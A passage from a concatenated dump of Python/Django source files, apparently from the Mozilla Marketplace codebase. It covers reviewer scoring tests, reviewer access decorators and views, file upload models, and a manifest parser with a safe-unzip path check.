amo.STATUS_REVIEW_PENDING: None,
amo.STATUS_BLOCKED: None,
}
for tk, tv in types.items():
for sk, sv in statuses.items():
try:
event = getattr(amo, 'REVIEWED_%s_%s' % (tv, sv))
except AttributeError:
try:
event = getattr(amo, 'REVIEWED_%s' % tv)
except AttributeError:
event = None
self.check_event(tk, sk, event)
def test_events_webapps(self):
self.addon = amo.tests.app_factory()
self.check_event(self.addon.type, amo.STATUS_PENDING,
amo.REVIEWED_WEBAPP_HOSTED)
RereviewQueue.objects.create(addon=self.addon)
self.check_event(self.addon.type, amo.STATUS_PUBLIC,
amo.REVIEWED_WEBAPP_REREVIEW, in_rereview=True)
RereviewQueue.objects.all().delete()
self.addon.is_packaged = True
self.check_event(self.addon.type, amo.STATUS_PENDING,
amo.REVIEWED_WEBAPP_PACKAGED)
self.check_event(self.addon.type, amo.STATUS_PUBLIC,
amo.REVIEWED_WEBAPP_UPDATE)
def test_award_points(self):
self._give_points()
eq_(ReviewerScore.objects.all()[0].score,
amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_FULL])
def test_award_moderation_points(self):
ReviewerScore.award_moderation_points(self.user, self.addon, 1)
score = ReviewerScore.objects.all()[0]
eq_(score.score, amo.REVIEWED_SCORES.get(amo.REVIEWED_ADDON_REVIEW))
eq_(score.note_key, amo.REVIEWED_ADDON_REVIEW)
def test_get_total(self):
user2 = UserProfile.objects.get(email='[email protected]')
self._give_points()
self._give_points(status=amo.STATUS_LITE)
self._give_points(user=user2, status=amo.STATUS_NOMINATED)
eq_(ReviewerScore.get_total(self.user),
amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_FULL] +
amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_PRELIM])
eq_(ReviewerScore.get_total(user2),
amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_FULL])
def test_get_recent(self):
user2 = UserProfile.objects.get(email='[email protected]')
self._give_points()
time.sleep(1) # Wait 1 sec so ordering by created is checked.
self._give_points(status=amo.STATUS_LITE)
self._give_points(user=user2)
scores = ReviewerScore.get_recent(self.user)
eq_(len(scores), 2)
eq_(scores[0].score, amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_PRELIM])
eq_(scores[1].score, amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_FULL])
def test_get_leaderboards(self):
user2 = UserProfile.objects.get(email='[email protected]')
self._give_points()
self._give_points(status=amo.STATUS_LITE)
self._give_points(user=user2, status=amo.STATUS_NOMINATED)
leaders = ReviewerScore.get_leaderboards(self.user)
eq_(leaders['user_rank'], 1)
eq_(leaders['leader_near'], [])
eq_(leaders['leader_top'][0]['rank'], 1)
eq_(leaders['leader_top'][0]['user_id'], self.user.id)
eq_(leaders['leader_top'][0]['total'],
amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_FULL] +
amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_PRELIM])
eq_(leaders['leader_top'][1]['rank'], 2)
eq_(leaders['leader_top'][1]['user_id'], user2.id)
eq_(leaders['leader_top'][1]['total'],
amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_FULL])
self._give_points(
user=user2, addon=amo.tests.addon_factory(type=amo.ADDON_PERSONA))
leaders = ReviewerScore.get_leaderboards(
self.user, addon_type=amo.ADDON_PERSONA)
eq_(len(leaders['leader_top']), 1)
eq_(leaders['leader_top'][0]['user_id'], user2.id)
def test_no_admins_or_staff_in_leaderboards(self):
user2 = UserProfile.objects.get(email='[email protected]')
self._give_points()
self._give_points(status=amo.STATUS_LITE)
self._give_points(user=user2, status=amo.STATUS_NOMINATED)
leaders = ReviewerScore.get_leaderboards(self.user)
eq_(leaders['user_rank'], 1)
eq_(leaders['leader_near'], [])
eq_(leaders['leader_top'][0]['user_id'], self.user.id)
eq_(len(leaders['leader_top']), 1) # Only the editor is here.
assert user2.id not in [l['user_id'] for l in leaders['leader_top']], (
'Unexpected admin user found in leaderboards.')
def test_no_marketplace_points_in_amo_leaderboards(self):
self._give_points()
self._give_points(status=amo.STATUS_LITE)
self._give_points(addon=self.app, status=amo.STATUS_NOMINATED)
leaders = ReviewerScore.get_leaderboards(self.user,
types=amo.REVIEWED_AMO)
eq_(leaders['leader_top'][0]['total'],
amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_FULL] +
amo.REVIEWED_SCORES[amo.REVIEWED_ADDON_PRELIM])
def test_no_amo_points_in_marketplace_leaderboards(self):
self._give_points()
self._give_points(status=amo.STATUS_LITE)
self._give_points(addon=self.app, status=amo.STATUS_NOMINATED)
leaders = ReviewerScore.get_leaderboards(
self.user, types=amo.REVIEWED_MARKETPLACE)
eq_(leaders['leader_top'][0]['total'],
amo.REVIEWED_SCORES[amo.REVIEWED_WEBAPP_HOSTED])
def test_get_breakdown(self):
self._give_points()
self._give_points(addon=amo.tests.app_factory())
breakdown = ReviewerScore.get_breakdown(self.user)
eq_(len(breakdown), 2)
eq_(set([b.atype for b in breakdown]),
set([amo.ADDON_EXTENSION, amo.ADDON_WEBAPP]))
def test_get_breakdown_since(self):
self._give_points()
self._give_points(addon=amo.tests.app_factory())
rs = list(ReviewerScore.objects.all())
rs[0].update(created=self.days_ago(50))
breakdown = ReviewerScore.get_breakdown_since(self.user,
self.days_ago(30))
eq_(len(breakdown), 1)
eq_([b.atype for b in breakdown], [rs[1].addon.type])
def test_get_leaderboards_last(self):
users = []
for i in range(6):
users.append(UserProfile.objects.create(username='user-%s' % i))
last_user = users.pop(len(users) - 1)
for u in users:
self._give_points(user=u)
# Last user gets lower points by reviewing a persona.
addon = self.addon
addon.type = amo.ADDON_PERSONA
self._give_points(user=last_user, addon=addon)
leaders = ReviewerScore.get_leaderboards(last_user)
eq_(leaders['user_rank'], 6)
eq_(len(leaders['leader_top']), 3)
eq_(len(leaders['leader_near']), 2)
def test_all_users_by_score(self):
user2 = UserProfile.objects.get(email='[email protected]')
amo.REVIEWED_LEVELS[0]['points'] = 180
self._give_points()
self._give_points(status=amo.STATUS_LITE)
self._give_points(user=user2, status=amo.STATUS_NOMINATED)
users = ReviewerScore.all_users_by_score()
eq_(len(users), 2)
# First user.
eq_(users[0]['total'], 180)
eq_(users[0]['user_id'], self.user.id)
eq_(users[0]['level'], amo.REVIEWED_LEVELS[0]['name'])
# Second user.
eq_(users[1]['total'], 120)
eq_(users[1]['user_id'], user2.id)
eq_(users[1]['level'], '')
def test_caching(self):
self._give_points()
with self.assertNumQueries(1):
ReviewerScore.get_total(self.user)
with self.assertNumQueries(0):
ReviewerScore.get_total(self.user)
with self.assertNumQueries(1):
ReviewerScore.get_recent(self.user)
with self.assertNumQueries(0):
ReviewerScore.get_recent(self.user)
with self.assertNumQueries(1):
ReviewerScore.get_leaderboards(self.user)
with self.assertNumQueries(0):
ReviewerScore.get_leaderboards(self.user)
with self.assertNumQueries(1):
ReviewerScore.get_breakdown(self.user)
with self.assertNumQueries(0):
ReviewerScore.get_breakdown(self.user)
# New points invalidates all caches.
self._give_points()
with self.assertNumQueries(1):
ReviewerScore.get_total(self.user)
with self.assertNumQueries(1):
ReviewerScore.get_recent(self.user)
with self.assertNumQueries(1):
ReviewerScore.get_leaderboards(self.user)
with self.assertNumQueries(1):
ReviewerScore.get_breakdown(self.user)
########NEW FILE########
__FILENAME__ = views
import functools
from django.conf import settings
from django.core.cache import cache
from django.core.exceptions import PermissionDenied
from django.views.decorators.cache import never_cache
import amo
from access import acl
from amo.decorators import json_view, login_required
from users.models import UserProfile
from mkt.reviewers.utils import AppsReviewing
def _view_on_get(request):
"""Returns whether the user can access this page.
If the user is in a group with rule 'ReviewerTools:View' and the request is
a GET request, they are allowed to view.
"""
return (request.method == 'GET' and
acl.action_allowed(request, 'ReviewerTools', 'View'))
def reviewer_required(only=None, region=None):
"""Requires the user to be logged in as a reviewer or admin, or allows
someone with rule 'ReviewerTools:View' for GET requests.
Reviewer is someone who is in one of the groups with the following
permissions:
Addons:Review
Apps:Review
Personas:Review
If only is provided, it will only check for a certain type of reviewer.
Valid values for only are: addon, app, persona.
"""
def decorator(f):
@login_required
@functools.wraps(f)
def wrapper(request, *args, **kw):
if (acl.check_reviewer(request, only, region=kw.get('region')) or
_view_on_get(request)):
return f(request, *args, **kw)
else:
raise PermissionDenied
return wrapper
# If decorator has no args, and is "paren-less", it's callable.
if callable(only):
return decorator(only)
else:
return decorator
@never_cache
@json_view
@reviewer_required
def review_viewing(request):
if 'addon_id' not in request.POST:
return {}
addon_id = request.POST['addon_id']
user_id = request.amo_user.id
current_name = ''
is_user = 0
key = '%s:review_viewing:%s' % (settings.CACHE_PREFIX, addon_id)
interval = amo.EDITOR_VIEWING_INTERVAL
# Check who is viewing.
currently_viewing = cache.get(key)
# If nobody is viewing or current user is, set current user as viewing
if not currently_viewing or currently_viewing == user_id:
# We want to save it for twice as long as the ping interval,
# just to account for latency and the like.
cache.set(key, user_id, interval * 2)
currently_viewing = user_id
current_name = request.amo_user.name
is_user = 1
else:
current_name = UserProfile.objects.get(pk=currently_viewing).name
AppsReviewing(request).add(addon_id)
return {'current': currently_viewing, 'current_name': current_name,
'is_user': is_user, 'interval_seconds': interval}
@never_cache
@json_view
@reviewer_required
def queue_viewing(request):
if 'addon_ids' not in request.POST:
return {}
viewing = {}
user_id = request.amo_user.id
for addon_id in request.POST['addon_ids'].split(','):
addon_id = addon_id.strip()
key = '%s:review_viewing:%s' % (settings.CACHE_PREFIX, addon_id)
currently_viewing = cache.get(key)
if currently_viewing and currently_viewing != user_id:
viewing[addon_id] = (UserProfile.objects
.get(id=currently_viewing)
.display_name)
return viewing
########NEW FILE########
__FILENAME__ = admin
from django.contrib import admin
from .models import File
class FileAdmin(admin.ModelAdmin):
raw_id_fields = ('version',)
admin.site.register(File, FileAdmin)
########NEW FILE########
__FILENAME__ = cron
import hashlib
import os
import shutil
import stat
import time
from django.conf import settings
from django.core.cache import cache
import commonware.log
import cronjobs
from files.models import FileValidation
log = commonware.log.getLogger('z.cron')
@cronjobs.register
def cleanup_extracted_file():
log.info('Removing extracted files for file viewer.')
root = os.path.join(settings.TMP_PATH, 'file_viewer')
for path in os.listdir(root):
full = os.path.join(root, path)
age = time.time() - os.stat(full)[stat.ST_ATIME]
if (age) > (60 * 60):
log.debug('Removing extracted files: %s, %dsecs old.' %
(full, age))
shutil.rmtree(full)
# Nuke out the file and diff caches when the file gets removed.
id = os.path.basename(path)
try:
int(id)
except ValueError:
continue
key = hashlib.md5()
key.update(str(id))
cache.delete('%s:memoize:%s:%s' % (settings.CACHE_PREFIX,
'file-viewer', key.hexdigest()))
@cronjobs.register
def cleanup_validation_results():
"""Will remove all validation results. Used when the validator is
upgraded and results may no longer be relevant."""
# With a large enough number of objects not using no_cache() tracebacks
all = FileValidation.objects.no_cache().all()
log.info('Removing %s old validation results.' % (all.count()))
all.delete()
########NEW FILE########
__FILENAME__ = decorators
from datetime import datetime
import functools
import commonware.log
from cache_nuggets.lib import Token
from django import http
from django.core.exceptions import ObjectDoesNotExist, PermissionDenied
from django.shortcuts import get_object_or_404
from django.utils.http import http_date
import amo
from access import acl
from files.models import File
from mkt.files.helpers import DiffHelper, FileViewer
log = commonware.log.getLogger('z.addons')
def allowed(request, file):
allowed = acl.check_reviewer(request)
if not allowed:
try:
addon = file.version.addon
except ObjectDoesNotExist:
raise http.Http404
if addon.view_source and addon.status in amo.REVIEWED_STATUSES:
allowed = True
else:
allowed = acl.check_addon_ownership(request, addon, viewer=True,
dev=True)
if not allowed:
raise PermissionDenied
return True
def _get_value(obj, key, value, cast=None):
obj = getattr(obj, 'left', obj)
key = obj.get_default(key)
obj.select(key)
if obj.selected:
value = obj.selected.get(value)
return cast(value) if cast else value
def last_modified(request, obj, key=None, **kw):
return _get_value(obj, key, 'modified', datetime.fromtimestamp)
def etag(request, obj, key=None, **kw):
return _get_value(obj, key, 'md5')
def webapp_file_view(func, **kwargs):
@functools.wraps(func)
def wrapper(request, file_id, *args, **kw):
file_ = get_object_or_404(File, pk=file_id)
result = allowed(request, file_)
if result is not True:
return result
try:
obj = FileViewer(file_)
except ObjectDoesNotExist:
raise http.Http404
response = func(request, obj, *args, **kw)
if obj.selected:
response['ETag'] = '"%s"' % obj.selected.get('md5')
response['Last-Modified'] = http_date(obj.selected.get('modified'))
return response
return wrapper
def compare_webapp_file_view(func, **kwargs):
@functools.wraps(func)
def wrapper(request, one_id, two_id, *args, **kw):
one = get_object_or_404(File, pk=one_id)
two = get_object_or_404(File, pk=two_id)
for obj in [one, two]:
result = allowed(request, obj)
if result is not True:
return result
try:
obj = DiffHelper(one, two)
except ObjectDoesNotExist:
raise http.Http404
response = func(request, obj, *args, **kw)
if obj.left.selected:
response['ETag'] = '"%s"' % obj.left.selected.get('md5')
response['Last-Modified'] = http_date(obj.left.selected
.get('modified'))
return response
return wrapper
def webapp_file_view_token(func, **kwargs):
@functools.wraps(func)
def wrapper(request, file_id, key, *args, **kw):
viewer = FileViewer(get_object_or_404(File, pk=file_id))
token = request.GET.get('token')
if not token:
log.error('Denying access to %s, no token.' % viewer.file.id)
raise PermissionDenied
if not Token.valid(token, [viewer.file.id, key]):
log.error('Denying access to %s, token invalid.' % viewer.file.id)
raise PermissionDenied
return func(request, viewer, key, *args, **kw)
return wrapper
########NEW FILE########
__FILENAME__ = forms
from collections import defaultdict
from django import forms
from django.forms import widgets
import commonware.log
import happyforms
import jinja2
from tower import ugettext as _
import amo
from files.models import File
from versions.models import Version
log = commonware.log.getLogger('z.files')
class FileSelectWidget(widgets.Select):
def render_options(self, choices, selected_choices):
def option(files, label=None):
addon = files[0].version.addon
# Make sure that if there's a non-disabled version,
# that's the one we use for the ID.
files.sort(lambda a, b: ((a.status == amo.STATUS_DISABLED) -
(b.status == amo.STATUS_DISABLED)))
if label is None:
label = u', '.join(unicode(os.platform) for os in f)
output = [u'<option value="', jinja2.escape(files[0].id), u'" ']
if files[0].status == amo.STATUS_DISABLED:
# Disabled files can be diffed on Marketplace.
output.append(u' disabled')
if selected in files:
output.append(u' selected="true"')
status = set(u'status-%s' % amo.STATUS_CHOICES_API[f.status]
for f in files)
output.extend((u' class="', jinja2.escape(' '.join(status)), u'"'))
# Extend apps to show file status in selects.
label += ' (%s)' % amo.STATUS_CHOICES_API[f.status]
output.extend((u'>', jinja2.escape(label), u'</option>\n'))
return output
if selected_choices[0]:
selected = File.objects.get(id=selected_choices[0])
else:
selected = None
file_ids = [int(c[0]) for c in self.choices if c[0]]
output = []
output.append(u'<option></option>')
vers = Version.objects.filter(files__id__in=file_ids).distinct()
for ver in vers.order_by('-created'):
hashes = defaultdict(list)
for f in ver.files.filter(id__in=file_ids):
hashes[f.hash].append(f)
distinct_files = hashes.values()
if len(distinct_files) == 1:
output.extend(option(distinct_files[0], ver.version))
elif distinct_files:
output.extend((u'<optgroup label="',
jinja2.escape(ver.version), u'">'))
for f in distinct_files:
output.extend(option(f))
output.append(u'</optgroup>')
return jinja2.Markup(u''.join(output))
class FileCompareForm(happyforms.Form):
left = forms.ModelChoiceField(queryset=File.objects.all(),
widget=FileSelectWidget)
right = forms.ModelChoiceField(queryset=File.objects.all(),
widget=FileSelectWidget, required=False)
def __init__(self, *args, **kw):
self.addon = kw.pop('addon')
super(FileCompareForm, self).__init__(*args, **kw)
queryset = File.objects.filter(version__addon=self.addon)
self.fields['left'].queryset = queryset
self.fields['right'].queryset = queryset
def clean(self):
if (not self.errors and
self.cleaned_data.get('right') == self.cleaned_data['left']):
raise forms.ValidationError(
_('Cannot diff a version against itself'))
return self.cleaned_data
########NEW FILE########
__FILENAME__ = models
import hashlib
import json
import os
import re
import unicodedata
import uuid
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.db import models
from django.dispatch import receiver
from django.template.defaultfilters import slugify
from django.utils.encoding import smart_str
import commonware
from uuidfield.fields import UUIDField
import amo
import amo.models
import amo.utils
from amo.decorators import use_master
from amo.storage_utils import copy_stored_file, move_stored_file
from amo.urlresolvers import reverse
from applications.models import Application, AppVersion
log = commonware.log.getLogger('z.files')
# Acceptable extensions.
EXTENSIONS = ('.webapp', '.json', '.zip')
class File(amo.models.OnChangeMixin, amo.models.ModelBase):
STATUS_CHOICES = amo.STATUS_CHOICES.items()
version = models.ForeignKey('versions.Version', related_name='files')
platform = models.ForeignKey('Platform', default=amo.PLATFORM_ALL.id)
filename = models.CharField(max_length=255, default='')
size = models.PositiveIntegerField(default=0) # In bytes.
hash = models.CharField(max_length=255, default='')
status = models.PositiveSmallIntegerField(choices=STATUS_CHOICES,
default=amo.STATUS_UNREVIEWED)
datestatuschanged = models.DateTimeField(null=True, auto_now_add=True)
reviewed = models.DateTimeField(null=True)
# Whether a webapp uses flash or not.
uses_flash = models.BooleanField(default=False, db_index=True)
class Meta(amo.models.ModelBase.Meta):
db_table = 'files'
def __unicode__(self):
return unicode(self.id)
@property
def amo_platform(self):
# TODO: Ideally this would be ``platform``.
return amo.PLATFORMS[self.platform_id]
@property
def has_been_validated(self):
try:
self.validation
except FileValidation.DoesNotExist:
return False
else:
return True
def get_url_path(self, src):
from amo.helpers import urlparams, absolutify
url = os.path.join(reverse('downloads.file', args=[self.id]),
self.filename)
# Firefox's Add-on Manager needs absolute urls.
return absolutify(urlparams(url, src=src))
@classmethod
def from_upload(cls, upload, version, platform, parse_data={}):
upload.path = amo.utils.smart_path(nfd_str(upload.path))
ext = os.path.splitext(upload.path)[1]
f = cls(version=version, platform=platform)
f.filename = f.generate_filename(extension=ext or '.zip')
f.size = storage.size(upload.path) # Size in bytes.
f.status = amo.STATUS_PENDING
f.hash = f.generate_hash(upload.path)
f.save()
log.debug('New file: %r from %r' % (f, upload))
# Move the uploaded file from the temp location.
copy_stored_file(upload.path, os.path.join(version.path_prefix,
nfd_str(f.filename)))
if upload.validation:
FileValidation.from_json(f, upload.validation)
return f
def generate_hash(self, filename=None):
"""Generate a hash for a file."""
hash = hashlib.sha256()
with open(filename or self.file_path, 'rb') as obj:
for chunk in iter(lambda: obj.read(1024), ''):
hash.update(chunk)
return 'sha256:%s' % hash.hexdigest()
def generate_filename(self, extension=None):
"""
Files are in the format of: {app_slug}-{version}.{extension}
"""
parts = []
addon = self.version.addon
# slugify drops unicode so we may end up with an empty string.
# Apache did not like serving unicode filenames (bug 626587).
extension = extension or '.zip' if addon.is_packaged else '.webapp'
# Apparently we have non-ascii slugs leaking into prod :(
# FIXME.
parts.append(slugify(addon.app_slug) or 'app')
parts.append(self.version.version)
self.filename = '-'.join(parts) + extension
return self.filename
@property
def file_path(self):
return os.path.join(settings.ADDONS_PATH, str(self.version.addon_id),
self.filename)
@property
def addon(self):
from addons.models import Addon
from versions.models import Version
version = Version.with_deleted.get(pk=self.version_id)
return Addon.with_deleted.get(pk=version.addon_id)
@property
def guarded_file_path(self):
return os.path.join(settings.GUARDED_ADDONS_PATH,
str(self.version.addon_id), self.filename)
def _signed(self):
split = self.filename.rsplit('.', 1)
split.insert(-1, 'signed')
return '.'.join(split)
@property
def signed_file_path(self):
return os.path.join(settings.SIGNED_APPS_PATH,
str(self.version.addon_id), self._signed())
@property
def signed_reviewer_file_path(self):
return os.path.join(settings.SIGNED_APPS_REVIEWER_PATH,
str(self.version.addon_id), self._signed())
@property
def extension(self):
return os.path.splitext(self.filename)[-1]
@classmethod
def mv(cls, src, dst, msg):
"""Move a file from src to dst."""
try:
if storage.exists(src):
log.info(msg % (src, dst))
move_stored_file(src, dst)
except UnicodeEncodeError:
log.error('Move Failure: %s %s' % (smart_str(src), smart_str(dst)))
def hide_disabled_file(self):
"""Move a disabled file to the guarded file path."""
if not self.filename:
return
src, dst = self.file_path, self.guarded_file_path
self.mv(src, dst, 'Moving disabled file: %s => %s')
def unhide_disabled_file(self):
if not self.filename:
return
src, dst = self.guarded_file_path, self.file_path
self.mv(src, dst, 'Moving undisabled file: %s => %s')
@use_master
def update_status(sender, instance, **kw):
if not kw.get('raw'):
try:
instance.version.addon.reload()
instance.version.addon.update_status()
if 'delete' in kw:
instance.version.addon.update_version(ignore=instance.version)
else:
instance.version.addon.update_version()
except models.ObjectDoesNotExist:
pass
def update_status_delete(sender, instance, **kw):
kw['delete'] = True
return update_status(sender, instance, **kw)
models.signals.post_save.connect(
update_status, sender=File, dispatch_uid='version_update_status')
models.signals.post_delete.connect(
update_status_delete, sender=File, dispatch_uid='version_update_status')
@receiver(models.signals.post_delete, sender=File,
dispatch_uid='cleanup_file')
def cleanup_file(sender, instance, **kw):
""" On delete of the file object from the database, unlink the file from
the file system """
if kw.get('raw') or not instance.filename:
return
# Use getattr so the paths are accessed inside the try block.
for path in ('file_path', 'guarded_file_path'):
try:
filename = getattr(instance, path)
except models.ObjectDoesNotExist:
return
if storage.exists(filename):
log.info('Removing filename: %s for file: %s'
% (filename, instance.pk))
storage.delete(filename)
@File.on_change
def check_file(old_attr, new_attr, instance, sender, **kw):
if kw.get('raw'):
return
old, new = old_attr.get('status'), instance.status
if new == amo.STATUS_DISABLED and old != amo.STATUS_DISABLED:
instance.hide_disabled_file()
elif old == amo.STATUS_DISABLED and new != amo.STATUS_DISABLED:
instance.unhide_disabled_file()
# Log that the hash has changed.
old, new = old_attr.get('hash'), instance.hash
if old != new:
try:
addon = instance.version.addon.pk
except models.ObjectDoesNotExist:
addon = 'unknown'
log.info('Hash changed for file: %s, addon: %s, from: %s to: %s' %
(instance.pk, addon, old, new))
class Platform(amo.models.ModelBase):
# `name` and `shortname` are provided in amo.__init__
# name = TranslatedField()
# shortname = TranslatedField()
class Meta(amo.models.ModelBase.Meta):
db_table = 'platforms'
def __unicode__(self):
if self.id in amo.PLATFORMS:
return unicode(amo.PLATFORMS[self.id].name)
else:
log.warning('Invalid platform')
return ''
class FileUpload(amo.models.ModelBase):
"""Created when a file is uploaded for validation/submission."""
uuid = UUIDField(primary_key=True, auto=True)
path = models.CharField(max_length=255, default='')
name = models.CharField(max_length=255, default='',
help_text="The user's original filename")
hash = models.CharField(max_length=255, default='')
user = models.ForeignKey('users.UserProfile', null=True)
valid = models.BooleanField(default=False)
is_webapp = models.BooleanField(default=False)
validation = models.TextField(null=True)
compat_with_app = models.ForeignKey(Application, null=True,
related_name='uploads_compat_for_app')
compat_with_appver = models.ForeignKey(AppVersion, null=True,
related_name='uploads_compat_for_appver')
task_error = models.TextField(null=True)
objects = amo.models.UncachedManagerBase()
class Meta(amo.models.ModelBase.Meta):
db_table = 'file_uploads'
def __unicode__(self):
return self.uuid
def save(self, *args, **kw):
if self.validation:
try:
if json.loads(self.validation)['errors'] == 0:
self.valid = True
except Exception:
log.error('Invalid validation json: %r' % self)
super(FileUpload, self).save()
def add_file(self, chunks, filename, size, is_webapp=False):
filename = smart_str(filename)
loc = os.path.join(settings.ADDONS_PATH, 'temp', uuid.uuid4().hex)
base, ext = os.path.splitext(amo.utils.smart_path(filename))
if ext in EXTENSIONS:
loc += ext
log.info('UPLOAD: %r (%s bytes) to %r' % (filename, size, loc))
hash = hashlib.sha256()
with storage.open(loc, 'wb') as fd:
for chunk in chunks:
hash.update(chunk)
fd.write(chunk)
self.path = loc
self.name = filename
self.hash = 'sha256:%s' % hash.hexdigest()
self.is_webapp = is_webapp
self.save()
@classmethod
def from_post(cls, chunks, filename, size, is_webapp=False):
fu = FileUpload()
fu.add_file(chunks, filename, size, is_webapp)
return fu
@property
def processed(self):
return bool(self.valid or self.validation)
class FileValidation(amo.models.ModelBase):
file = models.OneToOneField(File, related_name='validation')
valid = models.BooleanField(default=False)
errors = models.IntegerField(default=0)
warnings = models.IntegerField(default=0)
notices = models.IntegerField(default=0)
validation = models.TextField()
class Meta:
db_table = 'file_validation'
@classmethod
def from_json(cls, file, validation):
js = json.loads(validation)
new = cls(file=file, validation=validation, errors=js['errors'],
warnings=js['warnings'], notices=js['notices'])
new.valid = new.errors == 0
new.save()
return new
def nfd_str(u):
"""Uses NFD to normalize unicode strings."""
if isinstance(u, unicode):
return unicodedata.normalize('NFD', u).encode('utf-8')
return u
########NEW FILE########
__FILENAME__ = tasks
import logging
from django.conf import settings
from cache_nuggets.lib import Message
from celeryutils import task
from tower import ugettext as _
task_log = logging.getLogger('z.task')
@task
def extract_file(viewer, **kw):
# This message is for end users so they'll see a nice error.
msg = Message('file-viewer:%s' % viewer)
msg.delete()
# This flag is so that we can signal when the extraction is completed.
flag = Message(viewer._extraction_cache_key())
task_log.debug('[1@%s] Unzipping %s for file viewer.' % (
extract_file.rate_limit, viewer))
try:
flag.save('extracting') # Set the flag to a truthy value.
viewer.extract()
except Exception, err:
if settings.DEBUG:
msg.save(_('There was an error accessing file %s. %s.')
% (viewer, err))
else:
msg.save(_('There was an error accessing file %s.') % viewer)
task_log.error('[1@%s] Error unzipping: %s' % (extract_file.rate_limit,
err))
finally:
# Always delete the flag so the file never gets into a bad state.
flag.delete()
########NEW FILE########
__FILENAME__ = test_models
import json
import path
import amo
import amo.tests
from files.models import FileUpload
# TODO: Leave this here until unused in AMO. Update everything under mkt/ to
# use the `UploadTest` from mkt/files/tests/test_models.py.
class UploadTest(amo.tests.TestCase, amo.tests.AMOPaths):
"""
Base for tests that mess with file uploads, safely using temp directories.
"""
fixtures = ['applications/all_apps.json', 'base/appversion']
def setUp(self):
self._rename = path.path.rename
path.path.rename = path.path.copy
# The validator task (post Addon upload) loads apps.json
# so ensure it exists:
from django.core.management import call_command
call_command('dump_apps')
def tearDown(self):
path.path.rename = self._rename
def file_path(self, *args, **kw):
return self.file_fixture_path(*args, **kw)
def get_upload(self, filename=None, abspath=None, validation=None,
is_webapp=False):
xpi = open(abspath if abspath else self.file_path(filename)).read()
upload = FileUpload.from_post([xpi], filename=abspath or filename,
size=1234)
# Simulate what fetch_manifest() does after uploading an app.
upload.is_webapp = is_webapp
upload.validation = (validation or
json.dumps(dict(errors=0, warnings=1, notices=2,
metadata={}, messages=[])))
upload.save()
return upload
########NEW FILE########
__FILENAME__ = utils
import hashlib
import json
import logging
import os
import re
import shutil
import stat
import StringIO
import tempfile
import zipfile
from zipfile import BadZipfile
from django import forms
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.utils.translation import trans_real as translation
from tower import ugettext as _
import amo
from amo.utils import rm_local_tmp_dir, strip_bom, to_language
log = logging.getLogger('files.utils')
SIGNED_RE = re.compile('^META\-INF/(\w+)\.(rsa|sf)$')
def get_filepath(fileorpath):
"""Get the actual file path of fileorpath if it's a FileUpload object."""
if hasattr(fileorpath, 'path'): # FileUpload
return fileorpath.path
return fileorpath
def get_file(fileorpath):
"""Get a file-like object, whether given a FileUpload object or a path."""
if hasattr(fileorpath, 'path'): # FileUpload
return storage.open(fileorpath.path)
if hasattr(fileorpath, 'name'):
return fileorpath
return storage.open(fileorpath)
class WebAppParser(object):
def extract_locale(self, locales, key, default=None):
"""Gets a locale item based on key.
For example, given this:
locales = {'en': {'foo': 1, 'bar': 2},
'it': {'foo': 1, 'bar': 2}}
You can get english foo like:
self.extract_locale(locales, 'foo', 'en')
"""
ex = {}
for loc, data in locales.iteritems():
ex[loc] = data.get(key, default)
return ex
def get_json_data(self, fileorpath):
path = get_filepath(fileorpath)
if zipfile.is_zipfile(path):
zf = SafeUnzip(path)
zf.is_valid() # Raises forms.ValidationError if problems.
try:
data = zf.extract_path('manifest.webapp')
except KeyError:
raise forms.ValidationError(
_('The file "manifest.webapp" was not found at the root '
'of the packaged app archive.'))
else:
file_ = get_file(fileorpath)
data = file_.read()
file_.close()
return WebAppParser.decode_manifest(data)
@classmethod
def decode_manifest(cls, manifest):
"""
Returns manifest, stripped of BOMs and UTF-8 decoded, as Python dict.
"""
try:
data = strip_bom(manifest)
# Marketplace only supports UTF-8 encoded manifests.
decoded_data = data.decode('utf-8')
except (ValueError, UnicodeDecodeError) as exc:
msg = 'Error parsing manifest (encoding: utf-8): %s: %s'
log.error(msg % (exc.__class__.__name__, exc))
raise forms.ValidationError(
_('Could not decode the webapp manifest file.'))
try:
return json.loads(decoded_data)
except Exception:
raise forms.ValidationError(
_('The webapp manifest is not valid JSON.'))
def parse(self, fileorpath):
data = self.get_json_data(fileorpath)
loc = data.get('default_locale', translation.get_language())
default_locale = self.trans_locale(loc)
locales = data.get('locales', {})
if type(locales) == list:
raise forms.ValidationError(
_('Your specified app locales are not in the correct format.'))
localized_descr = self.extract_locale(locales, 'description',
default='')
if 'description' in data:
localized_descr.update({default_locale: data['description']})
localized_name = self.extract_locale(locales, 'name',
default=data['name'])
localized_name.update({default_locale: data['name']})
developer_info = data.get('developer', {})
developer_name = developer_info.get('name')
if not developer_name:
# Missing developer name shouldn't happen if validation took place,
# but let's be explicit about this just in case.
raise forms.ValidationError(
_("Developer name is required in the manifest in order to "
"display it on the app's listing."))
return {'guid': None,
'type': amo.ADDON_WEBAPP,
'name': self.trans_all_locales(localized_name),
'developer_name': developer_name,
'description': self.trans_all_locales(localized_descr),
'version': data.get('version', '1.0'),
'default_locale': default_locale,
'origin': data.get('origin')}
def trans_locale(self, locale):
return to_language(settings.SHORTER_LANGUAGES.get(locale, locale))
def trans_all_locales(self, locale_dict):
trans = {}
for key, item in locale_dict.iteritems():
key = self.trans_locale(key)
trans[key] = item
return trans
class SafeUnzip(object):
def __init__(self, source, mode='r'):
self.source = source
self.info = None
self.mode = mode
def is_valid(self, fatal=True):
"""
Runs some overall archive checks.
fatal: if the archive is not valid and fatal is True, it will raise
an error, otherwise it will return False.
"""
try:
zip = zipfile.ZipFile(self.source, self.mode)
except (BadZipfile, IOError):
if fatal:
log.info('Error extracting', exc_info=True)
raise
return False
_info = zip.infolist()
for info in _info:
if '..' in info.filename or info.filename.startswith('/'):
log.error('Extraction error, invalid file name (%s) in '
'archive: %s' % (info.filename, self.source))
# L10n: {0} is the name of the invalid file.
raise forms.ValidationError(
_('Invalid file name in archive: {0}').format(
info.filename))
